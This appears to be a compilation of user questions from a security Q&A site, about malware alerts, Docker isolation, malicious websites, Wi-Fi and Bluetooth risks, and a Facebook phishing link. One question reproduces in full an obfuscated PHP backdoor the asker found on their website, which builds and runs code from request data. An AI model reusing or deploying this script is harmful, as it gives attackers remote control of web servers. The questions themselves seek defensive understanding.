Possible Malicious Linux.Xor.DDoS installed

I am not an expert in information security. I am running Lubuntu on a laptop. Today, I ran chkrootkit and it printed the following:

INFECTED: Possible Malicious Linux.Xor.DDoS installed /tmp/clamav-71d2ee99f7e011424ab238571d720a88.tmp 

I did run clamscan. This is the first time I have seen this notice. I could not find any other reporting on it. Is this a known false positive, or does it represent a genuine intrusion — and if it is the latter, is the proper response to just go in and delete that .tmp file?

Can malicious applications running inside a docker container still be harmful?

I am very new to docker (and don’t usually program at a ‘systems’ level). I will be working on an open source project with complete strangers over the web over the next couple of months. I trust them, but I like to not have to trust people (meant in the best possible way).

I would like to know, if I download various repositories from github or elsewhere, and run them inside a docker container, is it possible for them to cause harm to my laptop in any way?

In case it’s relevant, the repositories will mostly be web applications (think django, node), and will likely use databases (postgres etc), and otherwise operate as regular locally hosted web applications. It is possible (like anything from github or the world wide web), that some apps could contain malicious code. I am curious to know if running such an app (containing malicious code) inside a docker container prevents that code from harming anything outside of the docker container (i.e. my laptop)?

What a malicious website can do in the worst scenario on a upgraded system [closed]

I use last Debian stable (buster as June 2020).

  • system upgraded everyday (and browser addons updated automatically)
  • Firefox 68.9.0esr (64 bits) (the one from apt package system)
  • decent hardware (less than 5 years old)
  • Debian security upgrade enabled

I’m aware of security concerns, I…

  • verify (before clicking a HTTP link) if the link looks like example.org, but are in fact example.org.random.tracker.io by example (I take care about phising and tracking)
  • take care of untrusted X509 certificates for https websites
  • avoid using non trusted Firefox addons
  • never open suspicious files in web or mails
  • don’t use weak passwords (and I don’t use the same on 2 websites)
  • never run Firefox as root (who do this ?)
  • use httpsEverywhere, uBlock-Origin, Ghostery, Decentraleyes Firefox addons

So my question:

  • what is the risk of opening a malicious website (if not in google safe browsing DB) ? What it can do, the worst way, apart phishing website ? (I guess crypto-mining at least, exploit of Firefox vulnerability…)

Attacking through a malicious HTML file apart from XSS through Javascript

I recently came across a behavior in a web application where the application (through the use of the header ‘Content-Disposition: attachment’) offers to download an HTML file instead of allowing it to get parsed by the browser. Interestingly, the GET requests to the URL that lets you download the HTML page passes the absolute path of the HTML file that will be downloaded – starting all the way from /usr/local....<snip>/public/mypage.html . If an attacker has the privilege to upload an HTML file to this location (public), apart from an XSS attack, what else can he/she do on the machine of a victim who downloads and open the HTML file crafted by the attacker.

I am aware of the XSS attacks , that one can do by injecting some malicious Javascript in the HTML file. Would like to know what else an attacker can get done outside of Javascript XSS attacks.

Can the headphone or earbud (Bluetooth or wired) transmit malicious code, virus, Trojan or any kind of malware from computer to computer?

I have an old computer and I am sure it has Trojan or malicious code but after that i bought new one the problem is i did not change my old headphone that used in my old computer and i plugged it in the new computer so are there any problem to use my old headphone ? and thank you

How do I go about decoding this malicious PHP script? [duplicate]

I came upon this script just by luck, actually. Ironically, it’s stored in a protected folder on my website and I don’t think

<?   $  catches ='r'; $  comforter ='$  r)ciEVi'; $  heroin = 'SgD'; $  intimal = 'T'; $  eldin = 'e';$  introspections= 'V';$  fugitive ='>v"__u)_'; $  lolly= ';rcv';  $  genially= '[aodka]:';  $  constellation ='_';$  grouped= '@'; $  clea = 'I';$  carlie ='6';  $  dialects = ')';  $  bun= 'ieagpsu'; $  grumbling = 'KSJ';  $  anne = 'i'; $  compiling= 'S_"efR"';$  exacerbated = 'l'; $  easement= '$  PPbct';$  bibliographies= '_sb';$  enlarge='I'; $  honeymooning = 'e"V,y_('; $  cal ='I';$  brushfire ='bR"='; $  diana= ')';$  domineer= 'OBTX';$  conceiving = 'f';  $  arden= '"';$  elementals='[ai'; $  elvira= ')H';$  conjunction='m_b)_O';$  categorizing= '['; $  consumption='(o?te'; $  laming = 'GU'; $  cockeye = ')';$  hinda='Ttr[nE"((';$  badly ='?'; $  distinguishing='ec (H'; $  circumstance = ';'; $  dad ='t';$  height= 'l(r]';  $  herby='B';$  chanticleers= 'dQ';$  isometric='Lvs'; $  blushing ='Y'; $  enthusiasms = 'aUe(i$  e'; $  loveliness= 'K'; $  develop = 'Q';$  gunter = 'v$  I('; $  celebrity='r';$  kirk='h'; $  fetch= '];vS';  $  lamentations= 'u';$  deeding='iCOaa$  s$  E';$  earphone = '[';$  ascetic ='tV';  $  down = ')';$  criminals = '_';$  barring= 'a';$  larceny = '_^vEtRga';  $  autocollimator = 'K'; $  granaries='W'; $  centerpiece = '_';$  darned= 'ree)kHe)e';$  basses= 'n$  t(rd)';$  dong= 'rpSeEUs';$  bridal='c';$  dealt= 'E'; $  italy='i';  $  chaparral ='T';$  dollie =';t=$  UKi'; $  extendible = 's'; $  artichoke ='Nafiu'; $  apologetically= 'i';  $  decent=']'; $  atop='d'; $  forum= 'a'; $  broomcorn='o'; $  bullets= 's'; $  judged=','; $  fruit= 'A'; $  crucial= 'eTT';$  dielectrics = 'a'; $  facings='HrrF(]B'; $  ammamaria = 's`ye'; $  crabapple = 't';$  deans='$  ';  $  auras='shHnTe';$  chillers= 'TsZ:('; $  ambled = 'R'; $  eye = '4P$  C"M?';$  graham= $  bridal.  $  facings['2'].$  auras[5] .$  dielectrics . $  crabapple. $  auras[5]. $  centerpiece .$  artichoke['2'] .$  artichoke['4'] . $  auras['3']. $  bridal.$  crabapple. $  apologetically. $  broomcorn . $  auras['3'] ;$  barker= $  distinguishing['2'] ;$  droll = $  graham ($  barker,$  auras[5]. $  larceny['2']. $  dielectrics .$  height['0'].$  chillers['4'].  $  dielectrics .$  facings['2'].$  facings['2'] . $  dielectrics .$  ammamaria['2'] . $  centerpiece .  $  dong['1'] .$  broomcorn. $  dong['1']. $  chillers['4'] .  $  artichoke['2'] . $  artichoke['4'] .$  auras['3'].$  bridal .$  centerpiece. $  larceny['6'].$  auras[5].  $  crabapple .$  centerpiece . $  dielectrics.  $  facings['2'] .$  larceny['6'] .$  chillers['1'].$  chillers['4'] . $  basses['6']. $  basses['6']. $  basses['6'] .$  dollie['0']);  $  droll ($  elnar['2'], $  eye['3'],$  ammamaria['2'], $  conjunction[2] ,$  dollie['0'] , $  larceny['6'] , $  baldwin, $  grouped,  $  chillers['1'],$  domineer['3'] , $  eye['2']. $  apologetically . $  dollie['2'].$  dielectrics. $  facings['2'] .$  facings['2'] . $  dielectrics.$  ammamaria['2'] .$  centerpiece . $  conjunction[0] . $  auras[5] .$  facings['2'].$  larceny['6']. $  auras[5] .$  chillers['4'] .$  eye['2'] .$  centerpiece . $  ambled .$  dealt . $  develop. $  dollie['4'] . $  dealt. $  dong['2'] . $  chillers['0'].$  judged. $  eye['2']. $  centerpiece .$  eye['3'] .$  deeding['2']. $  deeding['2'].$  dollie['5'].  $  gunter['2']. $  dealt .$  judged .$  eye['2'] . $  centerpiece . $  dong['2']. $  dealt .$  ambled .$  ascetic['1'] .$  dealt.$  ambled .$  basses['6'] .$  dollie['0'] . $  eye['2']. $  dielectrics .$  dollie['2']. $  apologetically.$  chillers['1']. $  chillers['1'].$  auras[5].  $  crabapple . $  chillers['4'].$  eye['2'] .$  apologetically.$  earphone. $  eye['4'] . $  apologetically .$  artichoke['4']. $  larceny['2']. $  conjunction[2] .$  darned['4'] .  $  crabapple. $  chillers['1'] .$  auras['1'] . $  eye['4'] .$  facings['5'] . $  basses['6'] . $  eye[6] .$  eye['2'] .$  apologetically .$  earphone.$  eye['4'] . $  apologetically . $  artichoke['4'] .  $  larceny['2']. $  conjunction[2] .$  darned['4']. $  crabapple. $  chillers['1'].$  auras['1']. $  eye['4'] . $  facings['5'] . $  chillers[3] .$  chillers['4'] .  $  apologetically.$  chillers['1']. $  chillers['1']. $  auras[5] .$  crabapple . $  chillers['4']. $  eye['2'] .$  apologetically .$  earphone. $  eye['4'] .  $  auras['2'].$  chillers['0'] . $  chillers['0'] . $  eye['1'] .$  centerpiece.  $  gunter['2']. $  dollie['4'] .$  ascetic['1'] . $  facings['6'] .$  dollie['5'] . $  chillers['0'].$  dong['2']. $  auras['2'] .  $  eye['4'].$  facings['5']. $  basses['6'] . $  eye[6].$  eye['2'].$  apologetically. $  earphone. $  eye['4'].$  auras['2'] . $  chillers['0']. $  chillers['0'] . $  eye['1'].$  centerpiece .  $  gunter['2']. $  dollie['4'] .  $  ascetic['1'] .$  facings['6'] .$  dollie['5']. $  chillers['0'] . $  dong['2'] . $  auras['2'] .$  eye['4'] .$  facings['5'] . $  chillers[3].$  atop . $  apologetically. $  auras[5].$  basses['6'] .$  dollie['0']. $  auras[5]. $  larceny['2'].$  dielectrics .  $  height['0'] .$  chillers['4'].$  chillers['1'] .$  crabapple. $  facings['2'] . $  facings['2'] . $  auras[5]. $  larceny['2'] . $  chillers['4'] .$  conjunction[2].$  dielectrics . $  chillers['1'] .$  auras[5] . $  carlie . $  eye['0']. $  centerpiece. $  atop . $  auras[5] . $  bridal .$  broomcorn. $  atop.  $  auras[5]. $  chillers['4']. $  chillers['1']. $  crabapple. $  facings['2']. $  facings['2'] .$  auras[5].$  larceny['2'] . $  chillers['4'] . $  eye['2'] . $  dielectrics. $  basses['6']. $  basses['6'] .$  basses['6']. $  basses['6'].$  dollie['0']); ?> 

How to stop malicious WIFI from doing (whatever it wants to do)?

Was reading this: How to check if a Wi-Fi network is safe to connect to?

When I came across some comments

I can redirect you to other pages without your interaction. Install key loggers. Heck if your browser runs activeX objects I could open a shell on your machine without your knowledge. That last example is rare these days but what’s not rare is tricking you into installing a shell for me, keylogging, session stealing, and redirection.

Or as I mentioned in my post, drop a crypto miner on your machine with the tool I wrote

Written by Anthony Russell in the comments of his answer.

So, this looks bad, obviously. What I want to know is how can I stop these attacks? Blocking javascript sounds like a good start, the original post also suggested to check my device for open ports (they did not demonstrate how to shut them though). What else? Is there a fool-proof way to prevent these sort of (virus injection? remote control?) attacks? I am not talking about logging, though. That’s a given when you connect to any network.

What I’m most worried about is virus injection. But other attacks (like key loggers) mentioned above are concerns too. Just share whatever comes to mind. I’m sure other people will fill in the blanks.

Sorry if I sound like a complete noob. That’s because I am. Sorry in advance.

Can a malicious WIFI network force a connection

Say I enter a place with public WIFI. Of course, I would not connect to the network since I know it’s risky, but I do have my computer turned on. Can an attacker know my computer is there and force a connection to it? If they would be able to do so, than my precaution is wasted, and any attacks a malicious network could do would be done.

Telling me whether this could be done and how to stop it would be very helpful, thanks.

As a sidenote, connecting to a known network may not be safe either, could hackers “replace” an existing network with a malicious network with the same name? If so, how to protect myself against it?

Can Bluetooth “headphones” be malicious?

I received a parcel from Amazon which I did not order, addressed to me. It contained Bluetooth earphones. It may just be part of a brushing scam, but it’s got me curious.

So my question is.. Could a Bluetooth device be disguised as earphones and actually contain malware?

When attempting to connect my phone it appears as an audio device but prompts me to “Allow access to contacts and call history”.

Is “brizy dot site” a known malicious website?

I got a Facebook message from a friend, with a link to a supposed YouTube video, but instead it was pointing to plum1998318 dot brizy dot site.

Then I notices that someone posted on this friend’s Facebook wall that he got a message, clicked on the link in it and some hackers stole his password and send everyone a copy of that same message.

My friend didn’t send that message (not on purpose).

It seems that this malware propagates by sending Facebook messages.

Is it enough if he changes Facebook and YouTube passwords? Or did his computer get infected as well?